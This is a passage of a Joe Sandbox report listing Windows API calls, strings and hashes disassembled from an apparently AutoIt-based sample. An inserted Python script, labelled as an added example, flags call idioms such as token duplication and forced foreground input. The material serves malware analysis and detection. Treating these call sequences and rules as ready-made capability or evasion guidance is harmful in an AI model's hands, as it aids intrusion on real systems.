                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F$pb=
                                                                          • API String ID: 3977979337-1510193112
                                                                          • Opcode ID: d983b57e84277fc9abfb1fb763c4fad33317344c16b21dff8c1300e9d8f4ea1a
                                                                          • Instruction ID: 645e16d2ae14e0a32c2c03a06ac335b8f0940f4e5fb01e962019b8ce915c2835
                                                                          • Opcode Fuzzy Hash: d983b57e84277fc9abfb1fb763c4fad33317344c16b21dff8c1300e9d8f4ea1a
                                                                          • Instruction Fuzzy Hash: 5442AC74204341AFDB26CF28D885EAABBE9FF49350F15091AF595CB2B0C731E950DB92
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memset
                                                                          • String ID: ]<$3c2$DEFINE$P\<$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_2
                                                                          • API String ID: 1357608183-1036164097
                                                                          • Opcode ID: 0e289097325c4a303d83c98f917606501ee7ae6e570a8f3c00c7d165d487415b
                                                                          • Instruction ID: 43794acb38a3a20179bee3679a93fd9c4d0599784233a07758d3df421cf44b70
                                                                          • Opcode Fuzzy Hash: 0e289097325c4a303d83c98f917606501ee7ae6e570a8f3c00c7d165d487415b
                                                                          • Instruction Fuzzy Hash: EB93B275E04219DFDB26CF98D881BADB7B1FF48310F26816AE945AB385E7709D81CB40
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 003148DF
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0034D665
                                                                          • IsIconic.USER32(?), ref: 0034D66E
                                                                          • ShowWindow.USER32(?,00000009), ref: 0034D67B
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D685
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0034D69B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0034D6A2
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0034D6AE
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6BF
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6C7
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0034D6CF
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D6D2
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D6E7
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D6F2
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D6FC
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D701
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D70A
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D70F
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034D719
                                                                          • keybd_event.USER32(00000012,00000000), ref: 0034D71E
                                                                          • SetForegroundWindow.USER32(?), ref: 0034D721
                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0034D748
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 4125248594-2988720461
                                                                          • Opcode ID: e8a15c15928e8996c2eb30ca322be22e138343392f5a7dac4a74cfe0606b1ea7
                                                                          • Instruction ID: 9bfc9d29e97d0deca9d6132b35d9eb5458c467633e6aa07fea86cbe904214abf
                                                                          • Opcode Fuzzy Hash: e8a15c15928e8996c2eb30ca322be22e138343392f5a7dac4a74cfe0606b1ea7
                                                                          • Instruction Fuzzy Hash: 5C316571A40318BFEB226F619C49F7F7FACEB44B50F114026FA04EA1D1C6B15D51ABA1
                                                                          APIs
                                                                            • Part of subcall function 003687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
                                                                            • Part of subcall function 003687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
                                                                            • Part of subcall function 003687E1: GetLastError.KERNEL32 ref: 00368865
                                                                          • _memset.LIBCMT ref: 00368353
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003683A5
                                                                          • CloseHandle.KERNEL32(?), ref: 003683B6
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003683CD
                                                                          • GetProcessWindowStation.USER32 ref: 003683E6
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 003683F0
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0036840A
                                                                            • Part of subcall function 003681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368309), ref: 003681E0
                                                                            • Part of subcall function 003681CB: CloseHandle.KERNEL32(?,?,00368309), ref: 003681F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                          • String ID: $default$winsta0
                                                                          • API String ID: 2063423040-1027155976
                                                                          • Opcode ID: 577d8d662832ed76543cdb84a4054b89e80242e42558a71ab64af9408dfff358
                                                                          • Instruction ID: fb127444d3e8fbf79b808887b54fc6fca519862f4722644d1c82c8cf7cd83247
                                                                          • Opcode Fuzzy Hash: 577d8d662832ed76543cdb84a4054b89e80242e42558a71ab64af9408dfff358
                                                                          • Instruction Fuzzy Hash: 35816D71900209AFDF12DFA5CC45AEE7BBDFF09304F14826AF915A6265DB328E14DB20
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037C78D
                                                                          • FindClose.KERNEL32(00000000), ref: 0037C7E1
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C806
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C81D
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C844
                                                                          • __swprintf.LIBCMT ref: 0037C890
                                                                          • __swprintf.LIBCMT ref: 0037C8D3
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • __swprintf.LIBCMT ref: 0037C927
                                                                            • Part of subcall function 00333698: __woutput_l.LIBCMT ref: 003336F1
                                                                          • __swprintf.LIBCMT ref: 0037C975
                                                                            • Part of subcall function 00333698: __flsbuf.LIBCMT ref: 00333713
                                                                            • Part of subcall function 00333698: __flsbuf.LIBCMT ref: 0033372B
                                                                          • __swprintf.LIBCMT ref: 0037C9C4
                                                                          • __swprintf.LIBCMT ref: 0037CA13
                                                                          • __swprintf.LIBCMT ref: 0037CA62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 3953360268-2428617273
                                                                          • Opcode ID: dfb2062206a87ce2be32e135909b305f3880f3ef098cde554c1f335133d698cb
                                                                          • Instruction ID: 579f252603f09b98e071cdd6c62ff387af82478e98b102acb7ae99cec936b194
                                                                          • Opcode Fuzzy Hash: dfb2062206a87ce2be32e135909b305f3880f3ef098cde554c1f335133d698cb
                                                                          • Instruction Fuzzy Hash: CAA12FB1404204ABC716EF64C896EEFB7ECAF98700F40491EF595CA191EB35DA49CB62
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037EFB6
                                                                          • _wcscmp.LIBCMT ref: 0037EFCB
                                                                          • _wcscmp.LIBCMT ref: 0037EFE2
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037EFF4
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0037F00E
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0037F026
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F031
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0037F04D
                                                                          • _wcscmp.LIBCMT ref: 0037F074
                                                                          • _wcscmp.LIBCMT ref: 0037F08B
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037F09D
                                                                          • SetCurrentDirectoryW.KERNEL32(003C8920), ref: 0037F0BB
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F0C5
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F0D2
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F0E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1803514871-438819550
                                                                          • Opcode ID: e3c3b08f7783162154aa8ab640875457b19d728506a1cc15baf09669a5de1390
                                                                          • Instruction ID: d0109f58853180cbfdcc3a28bcc0f95ea721e9e4ac375a46fca418793e7f3481
                                                                          • Opcode Fuzzy Hash: e3c3b08f7783162154aa8ab640875457b19d728506a1cc15baf09669a5de1390
                                                                          • Instruction Fuzzy Hash: D231E5365012186FDB26AFB4DC48FEE77ACAF49360F148176E808E2191DB75DE80CB51
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390953
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0039F910,00000000,?,00000000,?,?), ref: 003909C1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00390A09
                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00390A92
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00390DB2
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00390DBF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 536824911-966354055
                                                                          • Opcode ID: 0a25c1e6bad82f5d9c6acfc157d8f142eead756a0edafc25d35fa105cf71f228
                                                                          • Instruction ID: dfbe5fc1c767776db46442c5e9f95627cf2e07611fb850c84d2df44e0ba3e6ed
                                                                          • Opcode Fuzzy Hash: 0a25c1e6bad82f5d9c6acfc157d8f142eead756a0edafc25d35fa105cf71f228
                                                                          • Instruction Fuzzy Hash: 20027C756006119FCB1AEF18C895E6AB7E9FF89310F05855DF89A9B362CB30ED41CB81
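The per-function API listings above are easiest to triage mechanically. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses the bullet format used in the APIs sections (call name, module, argument list, ref address, the "Part of subcall function" prefix, the String ID line and the Instruction Fuzzy Hash line that closes each record) and flags functions whose call sets match four idioms visible in the records above: the Shell_TrayWnd / AttachThreadInput / keybd_event sequence that forces a window to the foreground, the DuplicateTokenEx plus winsta0 / default desktop switch, the recursive FindFirstFileW / SetFileAttributesW walk, and the RegConnectRegistryW-backed registry write. The rule set, the record boundary and the rule labels are this example's assumptions, and the sample input is a constructed excerpt of bullets copied from the records on this page. One caveat for anyone using such rules: these call sequences match the stock implementations of AutoIt's built-in functions (WinActivate, RunAs, FileSetAttrib, RegWrite), so a hit records a capability present in the interpreter, not proof that the embedded script invokes it.

```python
# Added example (not part of the Joe Sandbox report): flag API-call idioms in
# per-function "APIs" listings. Rule set and record boundary are assumptions.
import re
from dataclasses import dataclass, field

# One bullet, e.g. "• AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6BF".
# Calls made inside a callee carry the prefix "Part of subcall function XXXX:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
HASH_LINE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-F]+)\s*$")


@dataclass
class Record:
    """One disassembled function: its API calls, referenced strings, fuzzy hash."""
    calls: list = field(default_factory=list)   # (name, module, args, ref)
    strings: set = field(default_factory=set)
    fuzzy_hash: str = ""

    def api_names(self) -> set:
        return {name for name, _, _, _ in self.calls}


def parse_records(text: str) -> list:
    """Split a listing into Records; the Instruction Fuzzy Hash line closes each one."""
    records, cur = [], Record()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            cur.calls.append((m["name"], m["module"], m["args"] or "", m["ref"]))
        elif m := STRING_LINE.match(line):
            cur.strings.update(s for s in m["ids"].split("$") if s)
        elif m := HASH_LINE.match(line):
            cur.fuzzy_hash = m["hash"]
            records.append(cur)
            cur = Record()
    return records


# (label, required API names, required String IDs): assumed rules, all must hold.
RULES = [
    ("force foreground window: AttachThreadInput + synthetic ALT (VK 0x12) via keybd_event",
     {"AttachThreadInput", "keybd_event", "SetForegroundWindow"}, {"Shell_TrayWnd"}),
    ("duplicate token and switch window station/desktop",
     {"AdjustTokenPrivileges", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
     {"winsta0"}),
    ("recursive directory walk rewriting file attributes",
     {"FindFirstFileW", "FindNextFileW", "SetFileAttributesW", "SetCurrentDirectoryW"}, set()),
    ("registry value write via RegConnectRegistry (remote-capable)",
     {"RegConnectRegistryW", "RegCreateKeyExW", "RegSetValueExW"}, set()),
]


def match_rules(records: list) -> list:
    """Return (fuzzy-hash prefix, label) for every rule a record fully satisfies."""
    hits = []
    for rec in records:
        names = rec.api_names()
        for label, apis, strs in RULES:
            if apis <= names and strs <= rec.strings:
                hits.append((rec.fuzzy_hash[:8], label))
    return hits


# Constructed excerpt: bullets copied from five functions in the report, trimmed.
SAMPLE = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0034D665
• SetForegroundWindow.USER32(?), ref: 0034D685
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0034D6BF
• keybd_event.USER32(00000012,00000000), ref: 0034D6F2
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: 5C316571A40318BFEB226F619C49F7F7FACEB44B50F114026FA04EA1D1C6B15D51ABA1
  • Part of subcall function 003687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003683A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003683CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0036840A
• String ID: $default$winsta0
• Instruction Fuzzy Hash: 35816D71900209AFDF12DFA5CC45AEE7BBDFF09304F14826AF915A6265DB328E14DB20
• FindFirstFileW.KERNEL32(?,?), ref: 0037C78D
• __swprintf.LIBCMT ref: 0037C890
• Instruction Fuzzy Hash: CAA12FB1404204ABC716EF64C896EEFB7ECAF98700F40491EF595CA191EB35DA49CB62
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037EFB6
• _wcscmp.LIBCMT ref: 0037EFCB
• SetFileAttributesW.KERNEL32(?,?), ref: 0037F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0037F026
• FindFirstFileW.KERNEL32(*.*,?), ref: 0037F04D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0037F09D
• String ID: *.*
• Instruction Fuzzy Hash: D231E5365012186FDB26AFB4DC48FEE77ACAF49360F148176E808E2191DB75DE80CB51
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0039F910,00000000,?,00000000,?,?), ref: 003909C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00390A92
• String ID: REG_BINARY$REG_DWORD$REG_SZ
• Instruction Fuzzy Hash: 20027C756006119FCB1AEF18C895E6AB7E9FF89310F05855DF89A9B362CB30ED41CB81
"""

if __name__ == "__main__":
    for prefix, label in match_rules(parse_records(SAMPLE)):
        print(f"{prefix}: {label}")
```

Run against a full report export, the third record above (FileTimeToSystemTime plus __swprintf) is the control: it shares FindFirstFileW with the recursive-walk rule but trips none of the rules, which is the point of requiring the whole call set rather than any single suspicious import.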
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0D;$0E;$0F;$3c2$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG;$_2
                                                                          • API String ID: 0-966160533
                                                                          • Opcode ID: 773f2a3502c8258e84bebf42ca7bf0364c00859c3f5d511e0bef4412bb44767b
                                                                          • Instruction ID: ca4ce6bb27bcf3041eac9d663dcdff02f44c0038d8f0b99a990e2eddc054f8ef
                                                                          • Opcode Fuzzy Hash: 773f2a3502c8258e84bebf42ca7bf0364c00859c3f5d511e0bef4412bb44767b
                                                                          • Instruction Fuzzy Hash: E072A475E00229CBDF16CF59D8817AEB7B5FF48310F25816AE906EB694DB309D81CB90
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0037F113
                                                                          • _wcscmp.LIBCMT ref: 0037F128
                                                                          • _wcscmp.LIBCMT ref: 0037F13F
                                                                            • Part of subcall function 00374385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003743A0
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0037F16E
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F179
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0037F195
                                                                          • _wcscmp.LIBCMT ref: 0037F1BC
                                                                          • _wcscmp.LIBCMT ref: 0037F1D3
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037F1E5
                                                                          • SetCurrentDirectoryW.KERNEL32(003C8920), ref: 0037F203
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037F20D
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F21A
                                                                          • FindClose.KERNEL32(00000000), ref: 0037F22C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 1824444939-438819550
                                                                          • Opcode ID: dad484a373ea9c41991e551dfc5722964f5f08cbe66cd7c36c0293a5ccc59dca
                                                                          • Instruction ID: 9989d2853cbc7ce8670d330f916d2a85ba5789a57116f31a9dc11d37df47e286
                                                                          • Opcode Fuzzy Hash: dad484a373ea9c41991e551dfc5722964f5f08cbe66cd7c36c0293a5ccc59dca
                                                                          • Instruction Fuzzy Hash: 1631E73A50021DAFDB22AF74EC89FEE77ACAF45360F118576E808E2091DB35DE45CA54
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0037A20F
                                                                          • __swprintf.LIBCMT ref: 0037A231
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0037A26E
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0037A293
                                                                          • _memset.LIBCMT ref: 0037A2B2
                                                                          • _wcsncpy.LIBCMT ref: 0037A2EE
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0037A323
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0037A32E
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0037A337
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0037A341
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 2a075d761d8bf0efc52fa0dc9e4f10bdd09a1427bc8b98caf34689a5e53d9093
                                                                          • Instruction ID: 5bcfbc6ba368833f4e9587120fe244f72ffbfc820b76395adeecd8ffcc0c56ee
                                                                          • Opcode Fuzzy Hash: 2a075d761d8bf0efc52fa0dc9e4f10bdd09a1427bc8b98caf34689a5e53d9093
                                                                          • Instruction Fuzzy Hash: 0031CFB6904109ABDB22DFA0DC89FEF77BCEF88700F1081B6F508D6161EB7596448B25
                                                                          APIs
                                                                            • Part of subcall function 00368202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0036821E
                                                                            • Part of subcall function 00368202: GetLastError.KERNEL32(?,00367CE2,?,?,?), ref: 00368228
                                                                            • Part of subcall function 00368202: GetProcessHeap.KERNEL32(00000008,?,?,00367CE2,?,?,?), ref: 00368237
                                                                            • Part of subcall function 00368202: HeapAlloc.KERNEL32(00000000,?,00367CE2,?,?,?), ref: 0036823E
                                                                            • Part of subcall function 00368202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368255
                                                                            • Part of subcall function 0036829F: GetProcessHeap.KERNEL32(00000008,00367CF8,00000000,00000000,?,00367CF8,?), ref: 003682AB
                                                                            • Part of subcall function 0036829F: HeapAlloc.KERNEL32(00000000,?,00367CF8,?), ref: 003682B2
                                                                            • Part of subcall function 0036829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00367CF8,?), ref: 003682C3
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00367D13
                                                                          • _memset.LIBCMT ref: 00367D28
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00367D47
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00367D58
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00367D95
